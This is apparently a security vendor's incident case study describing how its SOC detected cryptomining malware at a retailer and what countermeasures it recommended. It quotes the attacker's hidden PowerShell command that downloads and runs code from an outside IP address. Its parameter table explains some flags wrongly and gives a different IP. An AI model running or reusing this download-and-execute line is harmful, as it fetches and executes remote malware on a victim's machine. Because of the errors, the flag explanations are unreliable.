Cryptomining via PowerShell Caught at Retailer

The Network: A retailer with over 400 employees, over twelve distribution warehouses, and an extensive supply chain network to protect.

The Expectation: Protect the retailer’s assets and sensitive data to avoid malicious activity and enable services that are the backbone of the business.

The Catch:  The EventTracker SOC (Security Operations Center) detected malware that bypassed the customer’s traditional Anti-Virus (AV) software. EventTracker’s blue team defending the retail customer used relevant queries to cross-checking systems for suspicious behavior and to search running processes for anomalies.

The Find:  The analyst at the SOC used the advanced logic in EventTracker SIEM to detect a suspicious command with cmd.exe invoking PowerShell to download a suspicious file via http://209.222.101.129:80/a using Internet Explorer. PowerShell’s malicious use is often not detected or stopped by traditional endpoint defenses, as files and commands are not written to disk. The SOC actively monitors for suspicious use of well-known attack vectors such as PowerShell.

Command Line: powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient) .downloadstring('http://209.222.101.129:80/a'))".

The attacker then tried to evade the detection using:

Command Parameter Description
powershell.exe
-nop No Profile
-w Execution Policy Hidden
hidden Execution Policy Hidden
-c Command to run
"IEX Opening the file using IE
((new-object net.webclient).downloadstring Download
(http://63.250.42.171:80/a))" URL to download

The EventTracker SOC analyst detected the suspicious non-FQDN (Fully Qualified Domain Name) in the command line. The SOC analyst then uncovered a suspicious DLL downloaded to the system.

Observation: EventTracker has observed that SVChost.exe has created W3wp.exe process which downloaded Trojan Process 1588408199.3060014.dll, that threat vendors have categorized as a Trojan type of malware.

Win32/Tiggre!rfn.Trojan:Win32/Tiggre!rfn: is a malicious program created by cyber criminals to mine cryptocurrency on victims' computers. The unauthorized file is sent out to users as a video file, but it is an AutoIt script that runs specific tasks to misuse computer's resources for cryptomining.

After testing it in the EventTracker SOC sandbox, these activities confirmed that the URL was malicious:

  • Searches for the Microsoft Outlook file path
  • Attempts to load missing DLLs
  • Matches YARA signature
  • Creates temporary files
  • Reads ini files
  • Uses new MSVCR DLLs
  • Creates files inside the user directory
  • Reads software policies
  • Runs a DLL by calling functions
  • Spawns suspicious processes
  • Uses an in-process (OLE) automation server

Cryptomining malware infects workstations and laptops to create armies of botnets that perform computational-intensive algorithms in the background of unsuspecting companies. Cryptomining impacts system performance, consume power, and can be the doorway to other nefarious activity like stealing credentials or sensitive data to monetize. Use has exploded recently as exploit kits can be bought on the dark web for under $50 and used by less technical attackers. Cryptominers use known attack vectors like unsolicited phishing emails, socially engineered links, and malicious third-party apps that exploit vulnerabilities that should be detected and removed.

The Fix: The EventTracker SOC promptly alerted the retail customer to the compromise and provided detailed remediation recommendations. The EventTracker analyst continued to monitor the network for further infection and possible lateral movement. We recommended the following countermeasures to protect the retailer and their extended supply chain:

  • Block file attachments that are commonly associated with malware, such as .dll and .exe, and attachments that cannot be scanned by antivirus software, such as .zip files
  • Apply appropriate patches and update as quickly as feasible  
  • Check for unwanted browser extensions
  • Implement filters at the email gateway to screen out emails with known malspam indicators, such as known malicious subject lines, and block suspicious IP addresses at the firewall.
  • Adhere to the principal of least privilege. By ensuring that users have the minimum level of access required to accomplish their duties, you limit access to those with a “need to know” and share administrative credentials with designated administrators and not executives.
  • Provide employee training on social engineering and phishing. Urge employees not to open suspicious emails, click links contained in such emails, or post sensitive information online, and to never provide usernames, passwords, or personal information in response to any unsolicited request. Educate users to hover over a link with their mouse to verify the destination prior to clicking on the link.

The Lesson: It is estimated that 20% of all businesses have been compromised by cryptomining malware. Adversaries exploit known vulnerabilities to run their process-intensive mining. Legacy Anti-Virus (AV) solutions are often bypassed by these financially motivated cyber criminals. Consistent 24/7365 monitoring and log correlation with SIEM tools are also crucial for visibility and advanced threat protection along with a focused threat hunting team.